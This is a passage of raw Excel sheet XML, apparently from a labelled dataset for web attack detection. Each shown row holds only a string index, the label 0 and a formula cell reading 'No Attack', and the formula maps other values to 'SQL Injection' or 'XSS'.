      <c r="C27731" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27732" s="1" t="s">
        <v>10059</v>
      </c>
      <c r="B27732">
        <v>0</v>
      </c>
      <c r="C27732" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27733" s="1" t="s">
        <v>9927</v>
      </c>
      <c r="B27733">
        <v>0</v>
      </c>
      <c r="C27733" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27734" s="1" t="s">
        <v>9974</v>
      </c>
      <c r="B27734">
        <v>0</v>
      </c>
      <c r="C27734" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27735" s="1" t="s">
        <v>9911</v>
      </c>
      <c r="B27735">
        <v>0</v>
      </c>
      <c r="C27735" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27736" s="1" t="s">
        <v>9934</v>
      </c>
      <c r="B27736">
        <v>0</v>
      </c>
      <c r="C27736" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27737" s="1" t="s">
        <v>10095</v>
      </c>
      <c r="B27737">
        <v>0</v>
      </c>
      <c r="C27737" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27738" s="1" t="s">
        <v>10088</v>
      </c>
      <c r="B27738">
        <v>0</v>
      </c>
      <c r="C27738" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27739" s="1" t="s">
        <v>10152</v>
      </c>
      <c r="B27739">
        <v>0</v>
      </c>
      <c r="C27739" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27740" s="1" t="s">
        <v>9922</v>
      </c>
      <c r="B27740">
        <v>0</v>
      </c>
      <c r="C27740" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27741" s="1" t="s">
        <v>10067</v>
      </c>
      <c r="B27741">
        <v>0</v>
      </c>
      <c r="C27741" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27742" s="1" t="s">
        <v>10010</v>
      </c>
      <c r="B27742">
        <v>0</v>
      </c>
      <c r="C27742" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27743" s="1" t="s">
        <v>10077</v>
      </c>
      <c r="B27743">
        <v>0</v>
      </c>
      <c r="C27743" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27744" s="1" t="s">
        <v>10031</v>
      </c>
      <c r="B27744">
        <v>0</v>
      </c>
      <c r="C27744" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27745" s="1" t="s">
        <v>10017</v>
      </c>
      <c r="B27745">
        <v>0</v>
      </c>
      <c r="C27745" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27746" s="1" t="s">
        <v>10137</v>
      </c>
      <c r="B27746">
        <v>0</v>
      </c>
      <c r="C27746" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27747" s="1" t="s">
        <v>10157</v>
      </c>
      <c r="B27747">
        <v>0</v>
      </c>
      <c r="C27747" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27748" s="1" t="s">
        <v>9949</v>
      </c>
      <c r="B27748">
        <v>0</v>
      </c>
      <c r="C27748" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27749" s="1" t="s">
        <v>10063</v>
      </c>
      <c r="B27749">
        <v>0</v>
      </c>
      <c r="C27749" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27750" s="1" t="s">
        <v>10065</v>
      </c>
      <c r="B27750">
        <v>0</v>
      </c>
      <c r="C27750" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27751" s="1" t="s">
        <v>10143</v>
      </c>
      <c r="B27751">
        <v>0</v>
      </c>
      <c r="C27751" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27752" s="1" t="s">
        <v>10029</v>
      </c>
      <c r="B27752">
        <v>0</v>
      </c>
      <c r="C27752" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27753" s="1" t="s">
        <v>10004</v>
      </c>
      <c r="B27753">
        <v>0</v>
      </c>
      <c r="C27753" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27754" s="1" t="s">
        <v>9989</v>
      </c>
      <c r="B27754">
        <v>0</v>
      </c>
      <c r="C27754" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27755" s="1" t="s">
        <v>9994</v>
      </c>
      <c r="B27755">
        <v>0</v>
      </c>
      <c r="C27755" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27756" s="1" t="s">
        <v>9965</v>
      </c>
      <c r="B27756">
        <v>0</v>
      </c>
      <c r="C27756" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27757" s="1" t="s">
        <v>10121</v>
      </c>
      <c r="B27757">
        <v>0</v>
      </c>
      <c r="C27757" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27758" s="1" t="s">
        <v>10125</v>
      </c>
      <c r="B27758">
        <v>0</v>
      </c>
      <c r="C27758" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27759" s="1" t="s">
        <v>10084</v>
      </c>
      <c r="B27759">
        <v>0</v>
      </c>
      <c r="C27759" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27760" s="1" t="s">
        <v>10118</v>
      </c>
      <c r="B27760">
        <v>0</v>
      </c>
      <c r="C27760" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27761" s="1" t="s">
        <v>9969</v>
      </c>
      <c r="B27761">
        <v>0</v>
      </c>
      <c r="C27761" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27762" s="1" t="s">
        <v>10123</v>
      </c>
      <c r="B27762">
        <v>0</v>
      </c>
      <c r="C27762" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27763" spans="1:3" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A27763" s="1" t="s">
        <v>9879</v>
      </c>
      <c r="B27763">
        <v>0</v>
      </c>
      <c r="C27763" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27764" spans="1:3" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A27764" s="1" t="s">
        <v>11355</v>
      </c>
      <c r="B27764">
        <v>0</v>
      </c>
      <c r="C27764" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27765" s="1" t="s">
        <v>10120</v>
      </c>
      <c r="B27765">
        <v>0</v>
      </c>
      <c r="C27765" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27766" s="1" t="s">
        <v>10061</v>
      </c>
      <c r="B27766">
        <v>0</v>
      </c>
      <c r="C27766" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27767" s="1" t="s">
        <v>10086</v>
      </c>
      <c r="B27767">
        <v>0</v>
      </c>
      <c r="C27767" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27768" s="1" t="s">
        <v>10144</v>
      </c>
      <c r="B27768">
        <v>0</v>
      </c>
      <c r="C27768" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27769" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A27769" s="1" t="s">
        <v>10071</v>
      </c>
      <c r="B27769">
        <v>0</v>
      </c>
      <c r="C27769" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27770" s="1" t="s">
        <v>24194</v>
      </c>
      <c r="B27770">
        <v>0</v>
      </c>
      <c r="C27770" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27771" s="1" t="s">
        <v>20864</v>
      </c>
      <c r="B27771">
        <v>0</v>
      </c>
      <c r="C27771" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27772" s="1" t="s">
        <v>33635</v>
      </c>
      <c r="B27772">
        <v>0</v>
      </c>
      <c r="C27772" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27773" s="1" t="s">
        <v>20358</v>
      </c>
      <c r="B27773">
        <v>0</v>
      </c>
      <c r="C27773" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27774" s="1" t="s">
        <v>22075</v>
      </c>
      <c r="B27774">
        <v>0</v>
      </c>
      <c r="C27774" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27775" s="1" t="s">
        <v>29693</v>
      </c>
      <c r="B27775">
        <v>0</v>
      </c>
      <c r="C27775" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27776" s="1" t="s">
        <v>31894</v>
      </c>
      <c r="B27776">
        <v>0</v>
      </c>
      <c r="C27776" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27777" s="1" t="s">
        <v>10043</v>
      </c>
      <c r="B27777">
        <v>0</v>
      </c>
      <c r="C27777" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27778" s="1" t="s">
        <v>29541</v>
      </c>
      <c r="B27778">
        <v>0</v>
      </c>
      <c r="C27778" s="7" t="str">
        <f t="shared" si="433"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27779" s="1" t="s">
        <v>35675</v>
      </c>
      <c r="B27779">
        <v>0</v>
      </c>
      <c r="C27779" s="7" t="str">
        <f t="shared" ref="C27779:C27842" si="434">IF(B27779=0,"No Attack", IF(B27779=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27780" s="1" t="s">
        <v>22123</v>
      </c>
      <c r="B27780">
        <v>0</v>
      </c>
      <c r="C27780" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27781" s="1" t="s">
        <v>35819</v>
      </c>
      <c r="B27781">
        <v>0</v>
      </c>
      <c r="C27781" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27782" s="1" t="s">
        <v>35805</v>
      </c>
      <c r="B27782">
        <v>0</v>
      </c>
      <c r="C27782" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27783" s="1" t="s">
        <v>35443</v>
      </c>
      <c r="B27783">
        <v>0</v>
      </c>
      <c r="C27783" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27784" s="1" t="s">
        <v>10214</v>
      </c>
      <c r="B27784">
        <v>0</v>
      </c>
      <c r="C27784" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27785" s="1" t="s">
        <v>10883</v>
      </c>
      <c r="B27785">
        <v>0</v>
      </c>
      <c r="C27785" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27786" s="1" t="s">
        <v>23243</v>
      </c>
      <c r="B27786">
        <v>0</v>
      </c>
      <c r="C27786" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27787" s="1" t="s">
        <v>35603</v>
      </c>
      <c r="B27787">
        <v>0</v>
      </c>
      <c r="C27787" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27788" s="1" t="s">
        <v>29094</v>
      </c>
      <c r="B27788">
        <v>0</v>
      </c>
      <c r="C27788" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27789" s="1" t="s">
        <v>27637</v>
      </c>
      <c r="B27789">
        <v>0</v>
      </c>
      <c r="C27789" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27790" s="1" t="s">
        <v>36408</v>
      </c>
      <c r="B27790">
        <v>0</v>
      </c>
      <c r="C27790" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27791" s="1" t="s">
        <v>20171</v>
      </c>
      <c r="B27791">
        <v>0</v>
      </c>
      <c r="C27791" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27792" s="1" t="s">
        <v>36157</v>
      </c>
      <c r="B27792">
        <v>0</v>
      </c>
      <c r="C27792" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27793" s="1" t="s">
        <v>32159</v>
      </c>
      <c r="B27793">
        <v>0</v>
      </c>
      <c r="C27793" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27794" s="1" t="s">
        <v>30063</v>
      </c>
      <c r="B27794">
        <v>0</v>
      </c>
      <c r="C27794" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27795" s="1" t="s">
        <v>24347</v>
      </c>
      <c r="B27795">
        <v>0</v>
      </c>
      <c r="C27795" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27796" s="1" t="s">
        <v>34850</v>
      </c>
      <c r="B27796">
        <v>0</v>
      </c>
      <c r="C27796" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27797" s="1" t="s">
        <v>34091</v>
      </c>
      <c r="B27797">
        <v>0</v>
      </c>
      <c r="C27797" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27798" s="1" t="s">
        <v>35017</v>
      </c>
      <c r="B27798">
        <v>0</v>
      </c>
      <c r="C27798" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27799" s="1" t="s">
        <v>20276</v>
      </c>
      <c r="B27799">
        <v>0</v>
      </c>
      <c r="C27799" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27800" s="1" t="s">
        <v>34378</v>
      </c>
      <c r="B27800">
        <v>0</v>
      </c>
      <c r="C27800" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27801" s="1" t="s">
        <v>20160</v>
      </c>
      <c r="B27801">
        <v>0</v>
      </c>
      <c r="C27801" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27802" s="1" t="s">
        <v>20170</v>
      </c>
      <c r="B27802">
        <v>0</v>
      </c>
      <c r="C27802" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27803" s="1" t="s">
        <v>23803</v>
      </c>
      <c r="B27803">
        <v>0</v>
      </c>
      <c r="C27803" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27804" s="1" t="s">
        <v>27818</v>
      </c>
      <c r="B27804">
        <v>0</v>
      </c>
      <c r="C27804" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27805" s="1" t="s">
        <v>28632</v>
      </c>
      <c r="B27805">
        <v>0</v>
      </c>
      <c r="C27805" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27806" s="1" t="s">
        <v>21335</v>
      </c>
      <c r="B27806">
        <v>0</v>
      </c>
      <c r="C27806" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27807" s="1" t="s">
        <v>36516</v>
      </c>
      <c r="B27807">
        <v>0</v>
      </c>
      <c r="C27807" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27808" s="1" t="s">
        <v>21024</v>
      </c>
      <c r="B27808">
        <v>0</v>
      </c>
      <c r="C27808" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27809" s="1" t="s">
        <v>22097</v>
      </c>
      <c r="B27809">
        <v>0</v>
      </c>
      <c r="C27809" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27810" s="1" t="s">
        <v>35771</v>
      </c>
      <c r="B27810">
        <v>0</v>
      </c>
      <c r="C27810" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27811" s="1" t="s">
        <v>27958</v>
      </c>
      <c r="B27811">
        <v>0</v>
      </c>
      <c r="C27811" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27812" s="1" t="s">
        <v>22166</v>
      </c>
      <c r="B27812">
        <v>0</v>
      </c>
      <c r="C27812" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27813" s="1" t="s">
        <v>24081</v>
      </c>
      <c r="B27813">
        <v>0</v>
      </c>
      <c r="C27813" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27814" s="1" t="s">
        <v>35269</v>
      </c>
      <c r="B27814">
        <v>0</v>
      </c>
      <c r="C27814" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27815" s="1" t="s">
        <v>32342</v>
      </c>
      <c r="B27815">
        <v>0</v>
      </c>
      <c r="C27815" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27816" s="1" t="s">
        <v>35549</v>
      </c>
      <c r="B27816">
        <v>0</v>
      </c>
      <c r="C27816" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27817" s="1" t="s">
        <v>24242</v>
      </c>
      <c r="B27817">
        <v>0</v>
      </c>
      <c r="C27817" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27818" s="1" t="s">
        <v>31433</v>
      </c>
      <c r="B27818">
        <v>0</v>
      </c>
      <c r="C27818" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27819" s="1" t="s">
        <v>29584</v>
      </c>
      <c r="B27819">
        <v>0</v>
      </c>
      <c r="C27819" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27820" s="1" t="s">
        <v>34125</v>
      </c>
      <c r="B27820">
        <v>0</v>
      </c>
      <c r="C27820" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27821" s="1" t="s">
        <v>22942</v>
      </c>
      <c r="B27821">
        <v>0</v>
      </c>
      <c r="C27821" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27822" s="1" t="s">
        <v>36601</v>
      </c>
      <c r="B27822">
        <v>0</v>
      </c>
      <c r="C27822" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27823" s="1" t="s">
        <v>20598</v>
      </c>
      <c r="B27823">
        <v>0</v>
      </c>
      <c r="C27823" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27824" s="1" t="s">
        <v>22914</v>
      </c>
      <c r="B27824">
        <v>0</v>
      </c>
      <c r="C27824" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27825" s="1" t="s">
        <v>26981</v>
      </c>
      <c r="B27825">
        <v>0</v>
      </c>
      <c r="C27825" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27826" s="1" t="s">
        <v>22772</v>
      </c>
      <c r="B27826">
        <v>0</v>
      </c>
      <c r="C27826" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27827" s="1" t="s">
        <v>37422</v>
      </c>
      <c r="B27827">
        <v>0</v>
      </c>
      <c r="C27827" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27828" s="1" t="s">
        <v>10884</v>
      </c>
      <c r="B27828">
        <v>0</v>
      </c>
      <c r="C27828" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27829" s="1" t="s">
        <v>10215</v>
      </c>
      <c r="B27829">
        <v>0</v>
      </c>
      <c r="C27829" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27830" s="1" t="s">
        <v>10885</v>
      </c>
      <c r="B27830">
        <v>0</v>
      </c>
      <c r="C27830" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27831" s="1" t="s">
        <v>10886</v>
      </c>
      <c r="B27831">
        <v>0</v>
      </c>
      <c r="C27831" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27832" s="1" t="s">
        <v>10887</v>
      </c>
      <c r="B27832">
        <v>0</v>
      </c>
      <c r="C27832" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27833" s="1" t="s">
        <v>36679</v>
      </c>
      <c r="B27833">
        <v>0</v>
      </c>
      <c r="C27833" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27834" s="1" t="s">
        <v>27634</v>
      </c>
      <c r="B27834">
        <v>0</v>
      </c>
      <c r="C27834" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27835" s="1" t="s">
        <v>29612</v>
      </c>
      <c r="B27835">
        <v>0</v>
      </c>
      <c r="C27835" s="7" t="str">
        <f t="shared" si="434"/>
        <v>No Attack</v>
      </c>
    </row>
